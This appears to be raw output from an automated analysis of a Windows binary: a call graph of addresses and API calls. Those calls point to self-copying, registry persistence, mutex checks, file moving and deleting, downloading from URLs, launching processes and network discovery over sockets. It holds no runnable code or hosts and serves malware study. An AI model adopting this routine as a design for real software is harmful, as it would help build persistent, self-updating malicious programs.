5755->5754 5756 40bc10 5757 409c30 4 API calls 5756->5757 5758 40bc23 5757->5758 5759 40bab0 129 API calls 5758->5759 5760 40bc3a 5758->5760 5759->5760 5761 405a10 ExitThread 5762 404490 5763 40442b 5762->5763 5764 408fb0 __aligned_recalloc_base 3 API calls 5763->5764 5765 40449b LeaveCriticalSection 5764->5765 5415 4046dc 5418 4045dc 5415->5418 5416 4046d3 5417 4046fc 5416->5417 5419 4040f0 15 API calls 5416->5419 5420 408fb0 __aligned_recalloc_base 3 API calls 5417->5420 5418->5416 5421 408fb0 __aligned_recalloc_base 3 API calls 5418->5421 5419->5417 5422 40471d 5420->5422 5423 404632 5421->5423 5424 40472c CreateFileW 5422->5424 5425 4047be LeaveCriticalSection 5422->5425 5426 409020 8 API calls 5423->5426 5424->5425 5427 40474f 5424->5427 5428 404642 5426->5428 5431 4047aa FlushFileBuffers CloseHandle 5427->5431 5432 40476c WriteFile 5427->5432 5429 408fb0 __aligned_recalloc_base 3 API calls 5428->5429 5430 404669 5429->5430 5433 40ae60 7 API calls 5430->5433 5431->5425 5432->5427 5434 4046a0 5433->5434 5435 4058a0 10 API calls 5434->5435 5435->5416 5767 40de1f 5768 40dde0 5767->5768 5769 40de4b memmove 5768->5769 5770 40de5e 5768->5770 5769->5768 4250 405a20 Sleep 4251 405a48 4250->4251 4252 405a5a FindWindowA 4251->4252 4253 4061df CreateMutexA GetLastError 4251->4253 4252->4251 4256 405a7a Sleep MoveFileA MoveFileA FindWindowA 4252->4256 4254 406201 ExitProcess 4253->4254 4255 406209 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4253->4255 4265 406294 4255->4265 4257 405ac1 Sleep MoveFileA 4256->4257 4258 405adc Sleep 4256->4258 4257->4258 4259 405af3 4258->4259 4260 405b7a 9 API calls 4259->4260 4261 405b0e 8 API calls 4259->4261 4262 405c02 8 API calls 4260->4262 4263 405cf4 6 API calls 4260->4263 4261->4259 4268 405cdc InternetCloseHandle DeleteFileW 4262->4268 4292 405c7d 4262->4292 4269 405d79 7 API calls 4263->4269 4270 405fca 4263->4270 4264 406581 Sleep RegOpenKeyExA 4266 4065b2 8 API calls 4264->4266 4267 406698 RegOpenKeyExA 4264->4267 4265->4264 4334 40d4a0 GetLocaleInfoA 4265->4334 4266->4267 4272 4067a4 Sleep 4267->4272 4273 4066be 8 API calls 4267->4273 4268->4263 4274 405df3 MoveFileW MoveFileW InternetOpenUrlA 4269->4274 4275 405e9b InternetCloseHandle Sleep 4269->4275 4280 406055 PathFileExistsA 4270->4280 4281 405fec FindWindowA 4270->4281 4342 40b4a0 4272->4342 4273->4272 4284 405e83 InternetCloseHandle Sleep 4274->4284 4285 405e3c 6 API calls 4274->4285 4275->4270 4277 405ec0 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 4275->4277 4286 405f18 InternetOpenUrlA 4277->4286 4287 405fbd InternetCloseHandle 4277->4287 4278 406333 ExpandEnvironmentStringsW wsprintfW CopyFileW 4288 406460 Sleep wsprintfW CopyFileW 4278->4288 4289 406387 SetFileAttributesW RegOpenKeyExW 4278->4289 4279 40632b ExitProcess 4293 406064 10 API calls 4280->4293 4294 4060d7 FindWindowA 4280->4294 4281->4270 4290 406008 Sleep DeleteFileW MoveFileW Sleep Sleep 4281->4290 4283 405ca4 MoveFileW Sleep MoveFileA Sleep 4283->4292 4284->4275 4285->4284 4295 405f41 MoveFileW Sleep DeleteFileW 4286->4295 4296 405f67 7 API calls 4286->4296 4287->4270 4288->4264 4301 4064a8 SetFileAttributesW RegOpenKeyExW 4288->4301 4297 406441 4289->4297 4298 4063bc RegSetValueExW RegCloseKey 4289->4298 4290->4270 4292->4268 4292->4283 4293->4294 4302 4060f3 10 API calls 4294->4302 4303 40616c 4294->4303 4295->4296 4296->4287 4336 40d740 memset CreateProcessW 4297->4336 4298->4297 4299 40690c 4300 4067bf 9 API calls 4345 404200 InitializeCriticalSection CreateFileW 4300->4345 4306 406562 4301->4306 4307 4064dd RegSetValueExW RegCloseKey 4301->4307 4302->4303 4303->4251 4309 406193 MoveFileW DeleteFileW Sleep MoveFileW 4303->4309 4308 40d740 5 API calls 4306->4308 4307->4306 4313 40656e 4308->4313 4309->4303 4313->4264 4317 406579 ExitProcess 4313->4317 4314 406458 ExitProcess 4320 406874 CreateEventA 4377 40abd0 4320->4377 4329 40bf50 17 API calls 4330 4068d4 4329->4330 4331 40bf50 17 API calls 4330->4331 4332 4068f0 4331->4332 4333 40bf50 17 API calls 4332->4333 4333->4299 4335 406323 4334->4335 4335->4278 4335->4279 4337 40d7a0 Sleep 4336->4337 4338 40d7af ShellExecuteW 4336->4338 4341 40644d 4337->4341 4339 40d7e4 4338->4339 4340 40d7d5 Sleep 4338->4340 4339->4341 4340->4341 4341->4288 4341->4314 4422 40b470 4342->4422 4346 404325 4345->4346 4347 404238 CreateFileMappingW 4345->4347 4359 40d3d0 CoInitializeEx 4346->4359 4348 404259 MapViewOfFile 4347->4348 4349 40431b CloseHandle 4347->4349 4350 404311 CloseHandle 4348->4350 4351 404278 GetFileSize 4348->4351 4349->4346 4350->4349 4353 40428d 4351->4353 4352 404307 UnmapViewOfFile 4352->4350 4353->4352 4355 4042cc 4353->4355 4358 40429c 4353->4358 4551 40b4f0 4353->4551 4558 4040f0 4353->4558 4356 408fb0 __aligned_recalloc_base 3 API calls 4355->4356 4356->4358 4358->4352 4795 40c930 socket 4359->4795 4361 40d3f0 4362 40686f 4361->4362 4365 40d43a 4361->4365 4371 40d478 4361->4371 4805 40cfe0 4361->4805 4372 4057b0 CoInitializeEx SysAllocString 4362->4372 4820 409880 htons 4365->4820 4370 40d350 24 API calls 4370->4371 4839 4090d0 4371->4839 4373 4057d2 4372->4373 4374 4057e8 CoUninitialize 4372->4374 4984 405520 4373->4984 4374->4320 4993 40ab90 4377->4993 4380 40ab90 3 API calls 4381 40abee 4380->4381 4382 40ab90 3 API calls 4381->4382 4383 40abfe 4382->4383 4384 40ab90 3 API calls 4383->4384 4385 40688c 4384->4385 4386 40bea0 4385->4386 4387 408e40 7 API calls 4386->4387 4388 40beab 4387->4388 4389 406896 4388->4389 4390 40beb7 InitializeCriticalSection 4388->4390 4391 40a020 InitializeCriticalSection 4389->4391 4390->4389 4396 40a03a 4391->4396 4392 40a069 CreateFileW 4394 40a090 CreateFileMappingW 4392->4394 4395 40a152 4392->4395 4398 40a0b1 MapViewOfFile 4394->4398 4399 40a148 CloseHandle 4394->4399 5028 409a90 EnterCriticalSection 4395->5028 4396->4392 5000 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4396->5000 5001 409d70 4396->5001 4402 40a0cc GetFileSize 4398->4402 4403 40a13e CloseHandle 4398->4403 4399->4395 4401 40a157 4404 40bf50 17 API calls 4401->4404 4408 40a0eb 4402->4408 4403->4399 4405 4068a0 4404->4405 4410 40bf50 4405->4410 4406 40a134 UnmapViewOfFile 4406->4403 4408->4406 4409 409d70 25 API calls 4408->4409 5027 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4408->5027 4409->4408 4411 40bf67 EnterCriticalSection 4410->4411 4412 4068b9 4410->4412 5048 40bed0 4411->5048 4412->4329 4415 40c02b LeaveCriticalSection 4415->4412 4416 408ea0 9 API calls 4417 40bfa9 4416->4417 4417->4415 4418 40bfbb CreateThread 4417->4418 4418->4415 4419 40bfde 4418->4419 4420 40c002 GetCurrentProcess GetCurrentProcess DuplicateHandle 4419->4420 4421 40c024 4419->4421 4420->4421 4421->4415 4425 40b410 4422->4425 4426 40b443 4425->4426 4427 40b42e 4425->4427 4429 4067b4 4426->4429 4457 40b240 4426->4457 4431 40b0c0 4427->4431 4429->4299 4429->4300 4432 40b172 4431->4432 4433 40b0e9 4431->4433 4436 408e40 7 API calls 4432->4436 4456 40b16a 4432->4456 4433->4456 4491 408e40 4433->4491 4437 40b198 4436->4437 4439 401000 7 API calls 4437->4439 4437->4456 4441 40b1c5 4439->4441 4443 4011e0 10 API calls 4441->4443 4445 40b1df 4443->4445 4444 40b13f 4446 401000 7 API calls 4444->4446 4447 401000 7 API calls 4445->4447 4448 40b150 4446->4448 4449 40b1f0 4447->4449 4450 4011e0 10 API calls 4448->4450 4451 4011e0 10 API calls 4449->4451 4450->4456 4452 40b20a 4451->4452 4453 401000 7 API calls 4452->4453 4454 40b21b 4453->4454 4455 4011e0 10 API calls 4454->4455 4455->4456 4456->4429 4458 40b269 4457->4458 4459 40b31a 4457->4459 4460 40b312 4458->4460 4461 408e40 7 API calls 4458->4461 4459->4460 4463 408e40 7 API calls 4459->4463 4460->4429 4462 40b27f 4461->4462 4462->4460 4465 401000 7 API calls 4462->4465 4464 40b33e 4463->4464 4464->4460 4467 401000 7 API calls 4464->4467 4466 40b2a3 4465->4466 4468 408e40 7 API calls 4466->4468 4469 40b362 4467->4469 4470 40b2b2 4468->4470 4471 408e40 7 API calls 4469->4471 4472 4011e0 10 API calls 4470->4472 4473 40b371 4471->4473 4474 40b2db 4472->4474 4475 4011e0 10 API calls 4473->4475 4476 408fb0 __aligned_recalloc_base 3 API calls 4474->4476 4477 40b39a 4475->4477 4478 40b2e7 4476->4478 4479 408fb0 __aligned_recalloc_base 3 API calls 4477->4479 4480 401000 7 API calls 4478->4480 4481 40b3a6 4479->4481 4483 40b2f8 4480->4483 4482 401000 7 API calls 4481->4482 4484 40b3b7 4482->4484 4485 4011e0 10 API calls 4483->4485 4486 4011e0 10 API calls 4484->4486 4485->4460 4487 40b3d1 4486->4487 4488 401000 7 API calls 4487->4488 4489 40b3e2 4488->4489 4490 4011e0 10 API calls 4489->4490 4490->4460 4502 408da0 4491->4502 4494 401000 4523 408e60 4494->4523 4499 4011e0 4530 4010c0 4499->4530 4501 4011ff _invalid_parameter 4501->4444 4511 408b90 GetCurrentProcessId 4502->4511 4504 408dab 4507 408db7 __aligned_recalloc_base 4504->4507 4512 408d00 4504->4512 4506 408e2c 4506->4456 4506->4494 4507->4506 4508 408dd2 HeapAlloc 4507->4508 4508->4506 4509 408df9 __aligned_recalloc_base 4508->4509 4509->4506 4510 408e14 memset 4509->4510 4510->4506 4511->4504 4520 408b90 GetCurrentProcessId 4512->4520 4514 408d09 4515 408d26 HeapCreate 4514->4515 4521 408c70 GetProcessHeaps 4514->4521 4517 408d40 HeapSetInformation GetCurrentProcessId 4515->4517 4518 408d67 4515->4518 4517->4518 4518->4507 4520->4514 4522 408ca1 4521->4522 4522->4515 4522->4518 4524 408da0 __aligned_recalloc_base 7 API calls 4523->4524 4525 40100b 4524->4525 4526 401400 4525->4526 4527 40140a 4526->4527 4528 408e60 __aligned_recalloc_base 7 API calls 4527->4528 4529 401018 4528->4529 4529->4499 4531 40110e 4530->4531 4533 4010d1 4530->4533 4532 408e60 __aligned_recalloc_base 7 API calls 4531->4532 4531->4533 4535 401132 _invalid_parameter 4532->4535 4533->4501 4534 401162 memcpy 4536 401186 _invalid_parameter 4534->4536 4535->4534 4540 408fb0 4535->4540 4538 408fb0 __aligned_recalloc_base 3 API calls 4536->4538 4538->4533 4547 408b90 GetCurrentProcessId 4540->4547 4542 408fbb 4543 40115f 4542->4543 4548 408bb0 4542->4548 4543->4534 4546 408fd7 HeapFree 4546->4543 4547->4542 4549 408be0 HeapValidate 4548->4549 4550 408c00 4548->4550 4549->4550 4550->4543 4550->4546 4567 409020 4551->4567 4556 408fb0 __aligned_recalloc_base 3 API calls 4557 40b531 4556->4557 4557->4353 4775 408ea0 4558->4775 4561 409020 8 API calls 4562 40415b 4561->4562 4785 40ae60 4562->4785 4565 4041e1 4565->4353 4568 40904d 4567->4568 4569 408e60 __aligned_recalloc_base 7 API calls 4568->4569 4570 409062 4568->4570 4571 409064 memcpy 4568->4571 4569->4568 4570->4557 4572 40aa00 4570->4572 4571->4568 4574 40aa0c 4572->4574 4576 40aa68 4574->4576 4578 408fb0 __aligned_recalloc_base 3 API calls 4574->4578 4579 40aa2b 4574->4579 4580 40af50 4574->4580 4594 406920 4574->4594 4577 408fb0 __aligned_recalloc_base 3 API calls 4576->4577 4577->4579 4578->4574 4579->4556 4579->4557 4581 40af5f __aligned_recalloc_base 4580->4581 4582 408e60 __aligned_recalloc_base 7 API calls 4581->4582 4593 40af69 4581->4593 4583 40aff8 4582->4583 4584 401000 7 API calls 4583->4584 4583->4593 4585 40b00d 4584->4585 4586 401000 7 API calls 4585->4586 4587 40b015 4586->4587 4589 40b06d __aligned_recalloc_base 4587->4589 4597 40aef0 4587->4597 4602 401050 4589->4602 4592 401050 3 API calls 4592->4593 4593->4574 4710 408b10 4594->4710 4598 4011e0 10 API calls 4597->4598 4599 40af04 4598->4599 4608 4013e0 4599->4608 4601 40af1c 4601->4587 4604 401064 _invalid_parameter 4602->4604 4605 4010ae 4602->4605 4603 408fb0 __aligned_recalloc_base 3 API calls 4603->4605 4606 408fb0 __aligned_recalloc_base 3 API calls 4604->4606 4607 40108c 4604->4607 4605->4592 4606->4607 4607->4603 4611 4012d0 4608->4611 4610 4013fa 4610->4601 4612 4012e4 4611->4612 4613 4010c0 __aligned_recalloc_base 10 API calls 4612->4613 4614 40132d 4613->4614 4615 4010c0 __aligned_recalloc_base 10 API calls 4614->4615 4616 40133d 4615->4616 4617 4010c0 __aligned_recalloc_base 10 API calls 4616->4617 4618 40134d 4617->4618 4619 4010c0 __aligned_recalloc_base 10 API calls 4618->4619 4620 40135d 4619->4620 4621 401366 4620->4621 4622 40138f 4620->4622 4626 402c20 4621->4626 4643 4029d0 4622->4643 4625 401387 _invalid_parameter 4625->4610 4627 401400 _invalid_parameter 7 API calls 4626->4627 4628 402c37 4627->4628 4629 401400 _invalid_parameter 7 API calls 4628->4629 4630 402c46 4629->4630 4631 401400 _invalid_parameter 7 API calls 4630->4631 4632 402c55 4631->4632 4633 401400 _invalid_parameter 7 API calls 4632->4633 4642 402c64 _invalid_parameter 4633->4642 4635 402e0f _invalid_parameter 4636 401430 _invalid_parameter 3 API calls 4635->4636 4637 402e35 _invalid_parameter 4635->4637 4636->4635 4638 401430 _invalid_parameter 3 API calls 4637->4638 4639 402e5b _invalid_parameter 4637->4639 4638->4637 4640 401430 _invalid_parameter 3 API calls 4639->4640 4641 402e81 4639->4641 4640->4639 4641->4625 4642->4635 4646 401430 4642->4646 4650 402e90 4643->4650 4645 4029ec 4645->4625 4647 401446 4646->4647 4648 40143b 4646->4648 4647->4642 4649 408fb0 __aligned_recalloc_base 3 API calls 4648->4649 4649->4647 4651 402ea6 _invalid_parameter 4650->4651 4652 402eb8 _invalid_parameter 4651->4652 4653 402edd 4651->4653 4655 402f03 4651->4655 4652->4645 4680 402880 4653->4680 4656 402f3d 4655->4656 4657 402f5e 4655->4657 4690 402a00 4656->4690 4658 401400 _invalid_parameter 7 API calls 4657->4658 4660 402f6f 4658->4660 4661 401400 _invalid_parameter 7 API calls 4660->4661 4662 402f7e 4661->4662 4663 401400 _invalid_parameter 7 API calls 4662->4663 4664 402f8d 4663->4664 4665 401400 _invalid_parameter 7 API calls 4664->4665 4666 402f9c 4665->4666 4703 402950 4666->4703 4668 401400 _invalid_parameter 7 API calls 4669 402fca _invalid_parameter 4668->4669 4669->4668 4672 403084 _invalid_parameter 4669->4672 4670 401430 _invalid_parameter 3 API calls 4670->4672 4671 4033a3 _invalid_parameter 4673 401430 _invalid_parameter 3 API calls 4671->4673 4674 4033c9 _invalid_parameter 4671->4674 4672->4670 4672->4671 4673->4671 4675 401430 _invalid_parameter 3 API calls 4674->4675 4676 4033ef _invalid_parameter 4674->4676 4675->4674 4677 401430 _invalid_parameter 3 API calls 4676->4677 4678 403415 _invalid_parameter 4676->4678 4677->4676 4678->4652 4679 401430 _invalid_parameter 3 API calls 4678->4679 4679->4678 4681 40288e 4680->4681 4682 401400 _invalid_parameter 7 API calls 4681->4682 4683 4028ab 4682->4683 4684 401400 _invalid_parameter 7 API calls 4683->4684 4685 4028ba _invalid_parameter 4684->4685 4686 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4685->4686 4687 40291a _invalid_parameter 4685->4687 4686->4685 4688 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4687->4688 4689 402940 4687->4689 4688->4687 4689->4652 4691 401400 _invalid_parameter 7 API calls 4690->4691 4692 402a17 4691->4692 4693 401400 _invalid_parameter 7 API calls 4692->4693 4694 402a26 4693->4694 4695 401400 _invalid_parameter 7 API calls 4694->4695 4702 402a35 _invalid_parameter 4695->4702 4696 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4696->4702 4697 402bc1 _invalid_parameter 4698 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4697->4698 4699 402be7 _invalid_parameter 4697->4699 4698->4697 4700 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4699->4700 4701 402c0d 4699->4701 4700->4699 4701->4652 4702->4696 4702->4697 4704 401400 _invalid_parameter 7 API calls 4703->4704 4705 40295f _invalid_parameter 4704->4705 4706 402880 _invalid_parameter 9 API calls 4705->4706 4707 402998 _invalid_parameter 4706->4707 4708 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4707->4708 4709 4029c3 4707->4709 4708->4707 4709->4669 4711 408b22 4710->4711 4714 408a70 4711->4714 4715 408e60 __aligned_recalloc_base 7 API calls 4714->4715 4720 408a80 4715->4720 4716 40693f 4716->4574 4718 408abc 4721 408fb0 __aligned_recalloc_base 3 API calls 4718->4721 4720->4716 4720->4718 4723 407fb0 4720->4723 4730 408590 4720->4730 4735 408960 4720->4735 4721->4716 4724 407fc3 4723->4724 4729 407fb9 4723->4729 4725 408006 memset 4724->4725 4724->4729 4726 408027 4725->4726 4725->4729 4727 40802d memcpy 4726->4727 4726->4729 4743 407d80 4727->4743 4729->4720 4731 40859d 4730->4731 4732 4085a7 4730->4732 4731->4720 4732->4731 4733 40869f memcpy 4732->4733 4748 4082d0 4732->4748 4733->4732 4736 408976 4735->4736 4741 40896c 4735->4741 4737 4082d0 57 API calls 4736->4737 4736->4741 4738 4089f7 4737->4738 4739 407d80 6 API calls 4738->4739 4738->4741 4740 408a16 4739->4740 4740->4741 4742 408a2b memcpy 4740->4742 4741->4720 4742->4741 4744 407dce 4743->4744 4746 407d8e 4743->4746 4744->4729 4746->4744 4747 407cc0 6 API calls 4746->4747 4747->4746 4749 4082e1 4748->4749 4750 4082eb 4748->4750 4749->4732 4750->4749 4754 408110 4750->4754 4753 4082d0 57 API calls 4753->4749 4755 40811d 4754->4755 4756 408127 4754->4756 4755->4749 4755->4753 4756->4755 4757 4081b0 4756->4757 4758 4081b5 4756->4758 4759 408198 4756->4759 4765 407a70 4757->4765 4762 407d80 6 API calls 4758->4762 4761 407d80 6 API calls 4759->4761 4761->4757 4762->4757 4764 40825c memset 4764->4755 4766 407a89 4765->4766 4771 407a7f 4765->4771 4767 407950 6 API calls 4766->4767 4766->4771 4768 407b82 4767->4768 4769 408e60 __aligned_recalloc_base 7 API calls 4768->4769 4770 407bd1 4769->4770 4770->4771 4772 4077d0 44 API calls 4770->4772 4771->4755 4771->4764 4773 407bfe 4772->4773 4774 408fb0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4773->4774 4774->4771 4794 408b90 GetCurrentProcessId 4775->4794 4777 408eab 4778 408d00 __aligned_recalloc_base 5 API calls 4777->4778 4783 408eb7 __aligned_recalloc_base 4777->4783 4778->4783 4779 404117 4779->4561 4779->4565 4780 408bb0 __aligned_recalloc_base HeapValidate 4780->4783 4781 408f60 HeapAlloc 4781->4783 4782 408f2a HeapReAlloc 4782->4783 4783->4779 4783->4780 4783->4781 4783->4782 4784 408fb0 __aligned_recalloc_base 3 API calls 4783->4784 4784->4783 4788 40ae6b 4785->4788 4786 408e60 __aligned_recalloc_base 7 API calls 4786->4788 4787 4041a6 4787->4565 4789 4058a0 4787->4789 4788->4786 4788->4787 4790 408e60 __aligned_recalloc_base 7 API calls 4789->4790 4791 4058b0 4790->4791 4792 4058f7 4791->4792 4793 4058bc memcpy CreateThread CloseHandle 4791->4793 4792->4565 4793->4792 4794->4777 4796 40c95d htons inet_addr setsockopt 4795->4796 4802 40ca8e 4795->4802 4797 409880 8 API calls 4796->4797 4798 40c9d6 bind lstrlenA sendto ioctlsocket 4797->4798 4803 40ca2b 4798->4803 4799 40ca52 4852 409940 shutdown closesocket 4799->4852 4802->4361 4803->4799 4804 408ea0 9 API calls 4803->4804 4843 40c840 4803->4843 4804->4803 4859 40c610 memset InternetCrackUrlA InternetOpenA 4805->4859 4808 40d0fe 4808->4361 4810 408fb0 __aligned_recalloc_base 3 API calls 4810->4808 4814 40d0cb 4814->4810 4817 40d0c1 SysFreeString 4817->4814 4966 409840 inet_addr 4820->4966 4823 40992d 4828 40d350 4823->4828 4824 4098dc connect 4825 4098f0 getsockname 4824->4825 4826 409924 4824->4826 4825->4826 4969 409940 shutdown closesocket 4826->4969 4970 409820 inet_ntoa 4828->4970 4830 40d366 4831 40b790 11 API calls 4830->4831 4832 40d385 4831->4832 4833 40d3c8 4832->4833 4971 40d110 memset InternetCrackUrlA InternetOpenA 4832->4971 4833->4370 4836 40d3bc 4837 408fb0 __aligned_recalloc_base 3 API calls 4836->4837 4837->4833 4838 408fb0 __aligned_recalloc_base 3 API calls 4838->4836 4842 4090d4 4839->4842 4840 4090da 4840->4362 4841 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 4841->4842 4842->4840 4842->4841 4851 40c85c 4843->4851 4844 40c924 4844->4803 4845 40c878 recvfrom 4846 40c8a6 StrCmpNIA 4845->4846 4847 40c899 Sleep 4845->4847 4848 40c8c5 StrStrIA 4846->4848 4846->4851 4847->4851 4849 40c8e6 StrChrA 4848->4849 4848->4851 4853 40b640 4849->4853 4851->4844 4851->4845 4852->4802 4857 40b64b 4853->4857 4854 40b651 lstrlenA 4856 40b664 4854->4856 4854->4857 4855 408e60 __aligned_recalloc_base 7 API calls 4855->4857 4856->4851 4857->4854 4857->4855 4857->4856 4858 40b680 memcpy 4857->4858 4858->4856 4858->4857 4860 40c6b1 InternetConnectA 4859->4860 4861 40c827 4859->4861 4862 40c81a InternetCloseHandle 4860->4862 4863 40c6ea HttpOpenRequestA 4860->4863 4861->4808 4872 40c3b0 4861->4872 4862->4861 4864 40c720 HttpSendRequestA 4863->4864 4865 40c80d InternetCloseHandle 4863->4865 4866 40c800 InternetCloseHandle 4864->4866 4868 40c73d 4864->4868 4865->4862 4866->4865 4867 40c75e InternetReadFile 4867->4868 4869 40c78b 4867->4869 4868->4867 4868->4869 4870 408ea0 9 API calls 4868->4870 4869->4866 4871 40c7a6 memcpy 4870->4871 4871->4868 4901 40b570 4872->4901 4875 40c3da SysAllocString 4876 40c3f1 CoCreateInstance 4875->4876 4877 40c4a7 4875->4877 4878 40c49d SysFreeString 4876->4878 4881 40c416 4876->4881 4879 408fb0 __aligned_recalloc_base 3 API calls 4877->4879 4878->4877 4880 40c4b0 4879->4880 4880->4814 4882 40cf90 4880->4882 4881->4878 4918 40c4c0 4882->4918 4885 40ce70 4923 40cc90 4885->4923 4888 40cf19 4888->4817 4898 40b790 4888->4898 4891 40cdf0 6 API calls 4892 40cec7 4891->4892 4892->4888 4940 40cc10 4892->4940 4895 40cc10 6 API calls 4896 40ceff 4895->4896 4896->4888 4945 40c5b0 4896->4945 4961 40b700 4898->4961 4908 40b57d 4901->4908 4902 40b583 lstrlenA 4906 40b596 4902->4906 4902->4908 4904 408e60 __aligned_recalloc_base 7 API calls 4904->4908 4906->4875 4906->4880 4907 408fb0 __aligned_recalloc_base 3 API calls 4907->4908 4908->4902 4908->4904 4908->4906 4908->4907 4909 403b70 4908->4909 4913 403c40 4908->4913 4910 403b87 MultiByteToWideChar 4909->4910 4911 403b7a lstrlenA 4909->4911 4912 403bac 4910->4912 4911->4910 4912->4908 4914 403c4b 4913->4914 4915 403c51 lstrlenA 4914->4915 4916 403b70 2 API calls 4914->4916 4917 403c87 4914->4917 4915->4914 4916->4914 4917->4908 4919 40c4e6 4918->4919 4920 40c563 lstrcmpiW 4919->4920 4921 40c58b 4919->4921 4922 40c57b SysFreeString 4919->4922 4920->4919 4920->4922 4921->4814 4921->4885 4922->4919 4925 40ccb6 4923->4925 4924 40cdcd 4924->4888 4935 40cdf0 4924->4935 4925->4924 4926 40cd43 lstrcmpiW 4925->4926 4927 40cdc3 SysFreeString 4926->4927 4928 40cd56 4926->4928 4927->4924 4929 40c5b0 2 API calls 4928->4929 4931 40cd64 4929->4931 4930 40cdb5 4930->4927 4931->4927 4931->4930 4932 40cd93 lstrcmpiW 4931->4932 4933 40cda5 4932->4933 4934 40cdab SysFreeString 4932->4934 4933->4934 4934->4930 4936 40c5b0 2 API calls 4935->4936 4938 40ce0b 4936->4938 4937 40ce47 4937->4888 4937->4891 4938->4937 4939 40cc90 6 API calls 4938->4939 4939->4937 4941 40c5b0 2 API calls 4940->4941 4943 40cc2b 4941->4943 4942 40cc67 4942->4895 4942->4896 4943->4942 4949 40cab0 4943->4949 4947 40c5d6 4945->4947 4946 40c5ed 4946->4888 4947->4946 4948 40c4c0 2 API calls 4947->4948 4948->4946 4951 40cad6 4949->4951 4950 40cbed 4950->4942 4951->4950 4952 40cb63 lstrcmpiW 4951->4952 4953 40cbe3 SysFreeString 4952->4953 4954 40cb76 4952->4954 4953->4950 4955 40c5b0 2 API calls 4954->4955 4957 40cb84 4955->4957 4956 40cbd5 4956->4953 4957->4953 4957->4956 4958 40cbb3 lstrcmpiW 4957->4958 4959 40cbc5 4958->4959 4960 40cbcb SysFreeString 4958->4960 4959->4960 4960->4956 4962 40b70d 4961->4962 4963 408ea0 9 API calls 4962->4963 4964 40b6b0 _vscprintf wvsprintfA 4962->4964 4965 40b728 SysFreeString 4962->4965 4963->4962 4964->4962 4965->4817 4967 40986c socket 4966->4967 4968 409859 gethostbyname 4966->4968 4967->4823 4967->4824 4968->4967 4969->4823 4970->4830 4972 40d341 4971->4972 4973 40d1b4 InternetConnectA 4971->4973 4972->4836 4972->4838 4974 40d334 InternetCloseHandle 4973->4974 4975 40d1ed HttpOpenRequestA 4973->4975 4974->4972 4976 40d223 HttpAddRequestHeadersA HttpSendRequestA 4975->4976 4977 40d327 InternetCloseHandle 4975->4977 4978 40d31a InternetCloseHandle 4976->4978 4981 40d26d 4976->4981 4977->4974 4978->4977 4979 40d284 InternetReadFile 4980 40d2b1 4979->4980 4979->4981 4980->4978 4981->4979 4981->4980 4982 408ea0 9 API calls 4981->4982 4983 40d2cc memcpy 4982->4983 4983->4981 4990 405557 4984->4990 4985 4054d0 CoCreateInstance 4985->4990 4986 40572b 4988 405734 SysFreeString 4986->4988 4989 40573e SysFreeString 4986->4989 4987 408fb0 __aligned_recalloc_base 3 API calls 4987->4986 4988->4989 4989->4374 4990->4985 4991 4056a6 SysAllocString 4990->4991 4992 405572 4990->4992 4991->4990 4991->4992 4992->4986 4992->4987 4994 40ab9e 4993->4994 4996 40ab9a 4993->4996 4997 40ab50 CryptAcquireContextW 4994->4997 4996->4380 4998 40ab8b 4997->4998 4999 40ab6d CryptGenRandom CryptReleaseContext 4997->4999 4998->4996 4999->4998 5000->4396 5031 409ab0 gethostname 5001->5031 5004 409d89 5004->4396 5006 409d9c strstr 5007 409dac 5006->5007 5008 409ded EnterCriticalSection 5006->5008 5035 409820 inet_ntoa 5007->5035 5012 409e05 5008->5012 5010 409dba strstr 5010->5004 5011 409dca 5010->5011 5036 409820 inet_ntoa 5011->5036 5015 409e30 5012->5015 5037 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5012->5037 5016 409f29 LeaveCriticalSection 5015->5016 5018 408e40 7 API calls 5015->5018 5016->5004 5017 409dd8 strstr 5017->5004 5017->5008 5019 409e74 5018->5019 5019->5016 5038 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5019->5038 5021 409e92 5022 409eb4 Sleep 5021->5022 5023 409ebe 5021->5023 5025 409ee4 5021->5025 5022->5021 5024 408fb0 __aligned_recalloc_base 3 API calls 5023->5024 5024->5025 5025->5016 5039 4099a0 5025->5039 5027->4408 5029 4099a0 14 API calls 5028->5029 5030 409aa3 LeaveCriticalSection 5029->5030 5030->4401 5032 409ad7 gethostbyname 5031->5032 5033 409af3 5031->5033 5032->5033 5033->5004 5034 409820 inet_ntoa 5033->5034 5034->5006 5035->5010 5036->5017 5037->5015 5038->5021 5040 4099b4 5039->5040 5047 4099af 5039->5047 5041 408e60 __aligned_recalloc_base 7 API calls 5040->5041 5042 4099c8 5041->5042 5043 409a24 CreateFileW 5042->5043 5042->5047 5044 409a73 InterlockedExchange 5043->5044 5045 409a47 WriteFile FlushFileBuffers CloseHandle 5043->5045 5046 408fb0 __aligned_recalloc_base 3 API calls 5044->5046 5045->5044 5046->5047 5047->5016 5051 40bedd 5048->5051 5049 40bf41 5049->4415 5049->4416 5050 40bf01 WaitForSingleObject 5050->5051 5052 40bf1c CloseHandle 5050->5052 5051->5049 5051->5050 5052->5051 5436 409960 5437 409963 WaitForSingleObject 5436->5437 5438 409991 5437->5438 5439 40997b InterlockedDecrement 5437->5439 5440 40998a 5439->5440 5440->5437 5441 409a90 16 API calls 5440->5441 5441->5440 5442 40c360 5448 40dc40 5442->5448 5444 40c377 5445 40c3a1 5444->5445 5446 40c388 WaitForSingleObject 5444->5446 5447 40e0a0 8 API calls 5446->5447 5447->5445 5449 40dd2e 5448->5449 5450 40dc4e 5448->5450 5449->5444 5450->5449 5451 408e40 7 API calls 5450->5451 5452 40dc5e CreateEventA socket 5451->5452 5453 40dc95 5452->5453 5458 40dc9a 5452->5458 5454 40e0a0 8 API calls 5453->5454 5454->5458 5455 40dca4 htons setsockopt bind 5456 40dd14 CreateThread 5455->5456 